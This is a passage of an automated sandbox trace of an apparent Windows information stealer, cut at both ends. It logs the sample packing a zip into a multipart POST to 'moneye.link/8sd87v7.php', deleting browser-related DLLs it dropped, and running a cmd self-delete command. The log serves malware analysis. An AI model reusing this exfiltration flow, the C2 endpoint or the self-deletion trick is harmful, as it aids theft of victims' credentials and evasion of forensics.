_Dst=0x1fdfea8) returned 0x1fdfea8 [0177.334] memcpy (in: _Dst=0x1fdfea9, _Src=0x19877c, _Size=0x1 | out: _Dst=0x1fdfea9) returned 0x1fdfea9 [0177.334] memcpy (in: _Dst=0x1fdfeaa, _Src=0x19877c, _Size=0x1 | out: _Dst=0x1fdfeaa) returned 0x1fdfeaa [0177.334] memcpy (in: _Dst=0x1fdfeab, _Src=0x19877b, _Size=0x1 | out: _Dst=0x1fdfeab) returned 0x1fdfeab [0177.334] memcpy (in: _Dst=0x1fdfeac, _Src=0x19877b, _Size=0x1 | out: _Dst=0x1fdfeac) returned 0x1fdfeac [0177.334] memcpy (in: _Dst=0x1fdfead, _Src=0x19877a, _Size=0x1 | out: _Dst=0x1fdfead) returned 0x1fdfead [0177.334] memcpy (in: _Dst=0x1fdfeae, _Src=0x19877a, _Size=0x1 | out: _Dst=0x1fdfeae) returned 0x1fdfeae [0177.334] memcpy (in: _Dst=0x1fdfeaf, _Src=0x198779, _Size=0x1 | out: _Dst=0x1fdfeaf) returned 0x1fdfeaf [0177.334] memcpy (in: _Dst=0x1fdfeb0, _Src=0x198779, _Size=0x1 | out: _Dst=0x1fdfeb0) returned 0x1fdfeb0 [0177.334] memcpy (in: _Dst=0x1fdfeb1, _Src=0x529c50, _Size=0xe | out: _Dst=0x1fdfeb1) returned 0x1fdfeb1 [0177.334] memcpy (in: _Dst=0x1fdfebf, _Src=0x4f97e8, _Size=0x9 | out: _Dst=0x1fdfebf) returned 0x1fdfebf [0177.334] memcpy (in: _Dst=0x1fdfec8, _Src=0x19877f, _Size=0x1 | out: _Dst=0x1fdfec8) returned 0x1fdfec8 [0177.335] memcpy (in: _Dst=0x1fdfec9, _Src=0x19877f, _Size=0x1 | out: _Dst=0x1fdfec9) returned 0x1fdfec9 [0177.335] memcpy (in: _Dst=0x1fdfeca, _Src=0x19877e, _Size=0x1 | out: _Dst=0x1fdfeca) returned 0x1fdfeca [0177.335] memcpy (in: _Dst=0x1fdfecb, _Src=0x19877e, _Size=0x1 | out: _Dst=0x1fdfecb) returned 0x1fdfecb [0177.335] memcpy (in: _Dst=0x1fdfecc, _Src=0x19877d, _Size=0x1 | out: _Dst=0x1fdfecc) returned 0x1fdfecc [0177.335] memcpy (in: _Dst=0x1fdfecd, _Src=0x19877d, _Size=0x1 | out: _Dst=0x1fdfecd) returned 0x1fdfecd [0177.335] memcpy (in: _Dst=0x1fdfece, _Src=0x19877c, _Size=0x1 | out: _Dst=0x1fdfece) returned 0x1fdfece [0177.335] memcpy (in: _Dst=0x1fdfecf, _Src=0x19877c, _Size=0x1 | out: _Dst=0x1fdfecf) returned 0x1fdfecf [0177.335] memcpy (in: _Dst=0x1fdfed0, _Src=0x19877b, _Size=0x1 | out: _Dst=0x1fdfed0) returned 0x1fdfed0 [0177.335] memcpy (in: _Dst=0x1fdfed1, _Src=0x19877b, _Size=0x1 | out: _Dst=0x1fdfed1) returned 0x1fdfed1 [0177.335] memcpy (in: _Dst=0x1fdfed2, _Src=0x19877a, _Size=0x1 | out: _Dst=0x1fdfed2) returned 0x1fdfed2 [0177.335] memcpy (in: _Dst=0x1fdfed3, _Src=0x19877a, _Size=0x1 | out: _Dst=0x1fdfed3) returned 0x1fdfed3 [0177.335] memcpy (in: _Dst=0x1fdfed4, _Src=0x198779, _Size=0x1 | out: _Dst=0x1fdfed4) returned 0x1fdfed4 [0177.335] memcpy (in: _Dst=0x1fdfed5, _Src=0x198779, _Size=0x1 | out: _Dst=0x1fdfed5) returned 0x1fdfed5 [0177.335] memcpy (in: _Dst=0x1fdfed6, _Src=0x198778, _Size=0x1 | out: _Dst=0x1fdfed6) returned 0x1fdfed6 [0177.335] memcpy (in: _Dst=0x1fdfed7, _Src=0x198778, _Size=0x1 | out: _Dst=0x1fdfed7) returned 0x1fdfed7 [0177.335] memcpy (in: _Dst=0x1fdfed8, _Src=0x198777, _Size=0x1 | out: _Dst=0x1fdfed8) returned 0x1fdfed8 [0177.335] memcpy (in: _Dst=0x1fdfed9, _Src=0x198777, _Size=0x1 | out: _Dst=0x1fdfed9) returned 0x1fdfed9 [0177.335] memcpy (in: _Dst=0x1fdfeda, _Src=0x198776, _Size=0x1 | out: _Dst=0x1fdfeda) returned 0x1fdfeda [0177.335] memcpy (in: _Dst=0x1fdfedb, _Src=0x198776, _Size=0x1 | out: _Dst=0x1fdfedb) returned 0x1fdfedb [0177.335] memcpy (in: _Dst=0x1fdfedc, _Src=0x198775, _Size=0x1 | out: _Dst=0x1fdfedc) returned 0x1fdfedc [0177.335] memcpy (in: _Dst=0x1fdfedd, _Src=0x198775, _Size=0x1 | out: _Dst=0x1fdfedd) returned 0x1fdfedd [0177.335] GetProcessHeap () returned 0x4c0000 [0177.335] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x800000) returned 0xfbbf020 [0177.403] InternetOpenA (lpszAgent=0x0, dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0177.405] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x1987e4*, dwBufferLength=0x4) returned 1 [0177.405] StrCmpCA (pszStr1="http://", pszStr2="https://") returned -57 [0177.406] GetSystemTime (in: lpSystemTime=0x196428 | out: lpSystemTime=0x196428*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x3, wDay=0x3, wHour=0x11, wMinute=0x20, wSecond=0x28, wMilliseconds=0x1e7)) [0177.406] lstrcatA (in: lpString1="", lpString2="BIM7Y5P8Q9RIMYC2" | out: lpString1="BIM7Y5P8Q9RIMYC2") returned="BIM7Y5P8Q9RIMYC2" [0177.406] lstrcatA (in: lpString1="", lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0177.406] lstrcatA (in: lpString1="\r\n", lpString2="------" | out: lpString1="\r\n------") returned="\r\n------" [0177.406] lstrcatA (in: lpString1="\r\n------", lpString2="BIM7Y5P8Q9RIMYC2" | out: lpString1="\r\n------BIM7Y5P8Q9RIMYC2") returned="\r\n------BIM7Y5P8Q9RIMYC2" [0177.406] lstrcatA (in: lpString1="\r\n------BIM7Y5P8Q9RIMYC2", lpString2="--" | out: lpString1="\r\n------BIM7Y5P8Q9RIMYC2--") returned="\r\n------BIM7Y5P8Q9RIMYC2--" [0177.406] lstrcatA (in: lpString1="\r\n------BIM7Y5P8Q9RIMYC2--", lpString2="\r\n" | out: lpString1="\r\n------BIM7Y5P8Q9RIMYC2--\r\n") returned="\r\n------BIM7Y5P8Q9RIMYC2--\r\n" [0177.406] lstrcatA (in: lpString1="", lpString2="Content-Type: multipart/form-data; boundary=----" | out: lpString1="Content-Type: multipart/form-data; boundary=----") returned="Content-Type: multipart/form-data; boundary=----" [0177.406] lstrcatA (in: lpString1="Content-Type: multipart/form-data; boundary=----", lpString2="BIM7Y5P8Q9RIMYC2" | out: lpString1="Content-Type: multipart/form-data; boundary=----BIM7Y5P8Q9RIMYC2") returned="Content-Type: multipart/form-data; boundary=----BIM7Y5P8Q9RIMYC2" [0177.406] InternetConnectA (hInternet=0xcc0004, lpszServerName="moneye.link", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0177.406] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8sd87v7.php", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400100, dwContext=0x0) returned 0xcc000c [0177.407] lstrcatA (in: lpString1="", lpString2="------" | out: lpString1="------") returned="------" [0177.407] lstrcatA (in: lpString1="------", lpString2="BIM7Y5P8Q9RIMYC2" | out: lpString1="------BIM7Y5P8Q9RIMYC2") returned="------BIM7Y5P8Q9RIMYC2" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2", lpString2="\r\n" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\n") returned="------BIM7Y5P8Q9RIMYC2\r\n" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\n", lpString2="Content-Disposition: form-data; name=\"" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"", lpString2="file" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file", lpString2="\"\r\n\r\n" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n", lpString2="7YMYCBSR1N7YUA.zip" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip", lpString2="\r\n" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n", lpString2="------" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------", lpString2="BIM7Y5P8Q9RIMYC2" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2", lpString2="\r\n" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\n") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\n" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\n", lpString2="Content-Disposition: form-data; name=\"file\"; filename=\"" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"", lpString2="7YMYCBSR1N7YUA.zip" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip", lpString2="\"\r\n" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\n") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\n" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\n", lpString2="Content-Type: application/octet-stream" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream", lpString2="\r\n" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\n") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\n" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\n", lpString2="Content-Transfer-Encoding: binary" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary" [0177.407] lstrcatA (in: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary", lpString2="\r\n\r\n" | out: lpString1="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n" [0177.408] lstrlenA (lpString="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 268 [0177.408] lstrlenA (lpString="\r\n------BIM7Y5P8Q9RIMYC2--\r\n") returned 28 [0177.408] GetProcessHeap () returned 0x4c0000 [0177.408] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x40006) returned 0xfb30fd8 [0177.409] lstrlenA (lpString="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 268 [0177.409] memcpy (in: _Dst=0xfb30fd8, _Src=0x1981e0, _Size=0x10c | out: _Dst=0xfb30fd8) returned 0xfb30fd8 [0177.409] lstrlenA (lpString="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 268 [0177.409] memcpy (in: _Dst=0xfb310e4, _Src=0x1fa0000, _Size=0x3fede | out: _Dst=0xfb310e4) returned 0xfb310e4 [0177.412] lstrlenA (lpString="\r\n------BIM7Y5P8Q9RIMYC2--\r\n") returned 28 [0177.412] lstrlenA (lpString="------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n7YMYCBSR1N7YUA.zip\r\n------BIM7Y5P8Q9RIMYC2\r\nContent-Disposition: form-data; name=\"file\"; filename=\"7YMYCBSR1N7YUA.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 268 [0177.412] memcpy (in: _Dst=0xfb70fc2, _Src=0xfbbf020, _Size=0x1c | out: _Dst=0xfb70fc2) returned 0xfb70fc2 [0177.412] lstrlenA (lpString="Content-Type: multipart/form-data; boundary=----BIM7Y5P8Q9RIMYC2") returned 64 [0177.412] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=----BIM7Y5P8Q9RIMYC2", dwHeadersLength=0x40, lpOptional=0xfb30fd8*, dwOptionalLength=0x40006) returned 1 [0178.574] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x196d40, lpdwBufferLength=0x196e40, lpdwIndex=0x0 | out: lpBuffer=0x196d40*, lpdwBufferLength=0x196e40*=0x3, lpdwIndex=0x0) returned 1 [0178.574] StrCmpCA (pszStr1="200", pszStr2="200") returned 0 [0178.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x196558, dwNumberOfBytesToRead=0x7cf, lpdwNumberOfBytesRead=0x196550 | out: lpBuffer=0x196558*, lpdwNumberOfBytesRead=0x196550*=0x0) returned 1 [0178.574] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0178.574] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0178.574] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0178.574] CryptStringToBinaryA (in: pszString="", cchString=0x0, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x196518, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x196518, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0178.595] CryptStringToBinaryA (in: pszString="", cchString=0x0, dwFlags=0x1, pbBinary=0x1916f4, pcbBinary=0x196518, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1916f4, pcbBinary=0x196518, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0178.595] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0178.595] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\" (normalized: "c:\\programdata")) returned 1 [0178.595] lstrlenA (lpString="") returned 0 [0178.595] DeleteFileA (lpFileName="C:\\ProgramData\\sqlite3.dll" (normalized: "c:\\programdata\\sqlite3.dll")) returned 0 [0178.596] DeleteFileA (lpFileName="C:\\ProgramData\\freebl3.dll" (normalized: "c:\\programdata\\freebl3.dll")) returned 0 [0178.596] DeleteFileA (lpFileName="C:\\ProgramData\\mozglue.dll" (normalized: "c:\\programdata\\mozglue.dll")) returned 0 [0178.596] DeleteFileA (lpFileName="C:\\ProgramData\\msvcp140.dll" (normalized: "c:\\programdata\\msvcp140.dll")) returned 0 [0178.596] DeleteFileA (lpFileName="C:\\ProgramData\\nss3.dll" (normalized: "c:\\programdata\\nss3.dll")) returned 0 [0178.597] DeleteFileA (lpFileName="C:\\ProgramData\\softokn3.dll" (normalized: "c:\\programdata\\softokn3.dll")) returned 0 [0178.597] DeleteFileA (lpFileName="C:\\ProgramData\\vcruntime140.dll" (normalized: "c:\\programdata\\vcruntime140.dll")) returned 0 [0178.597] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19fe30, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe")) returned 0x2d [0178.597] wsprintfA (in: param_1=0x19fd28, param_2="/c timeout /t 5 & del /f /q \"%s\" & exit" | out: param_1="/c timeout /t 5 & del /f /q \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\" & exit") returned 82 [0178.598] ShellExecuteExA (in: pExecInfo=0x19ff3c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Windows\\System32\\cmd.exe", lpParameters="/c timeout /t 5 & del /f /q \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\" & exit", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x19ff3c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Windows\\System32\\cmd.exe", lpParameters="/c timeout /t 5 & del /f /q \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\" & exit", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0181.837] ExitProcess (uExitCode=0x0) Thread: id = 153 os_tid = 0xb14 Thread: id = 156 os_tid = 0xda4 Thread: id = 157 os_tid = 0xda0 Thread: id = 158 os_tid = 0xd9c Thread: id = 160 os_tid = 0xd50 Thread: id = 165 os_tid = 0xd40 Thread: id = 166 os_tid = 0xd3c Thread: id = 167 os_tid = 0xd38 Thread: id = 168 os_tid = 0xd34 Process: id = "9" image_name = "bcatcih" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih" page_root = "0x5aef2000" os_pid = "0xccc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x500" cmd_line = "C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2558 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2559 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2560 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2561 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2562 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2563 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2564 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2565 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2566 start_va = 0x400000 end_va = 0x24affff monitored = 1 entry_point = 0x416797 region_type = mapped_file name = "bcatcih" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih") Region: id = 2567 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2568 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2569 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2570 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2571 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2572 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 2582 start_va = 0x400000 end_va = 0x408fff monitored = 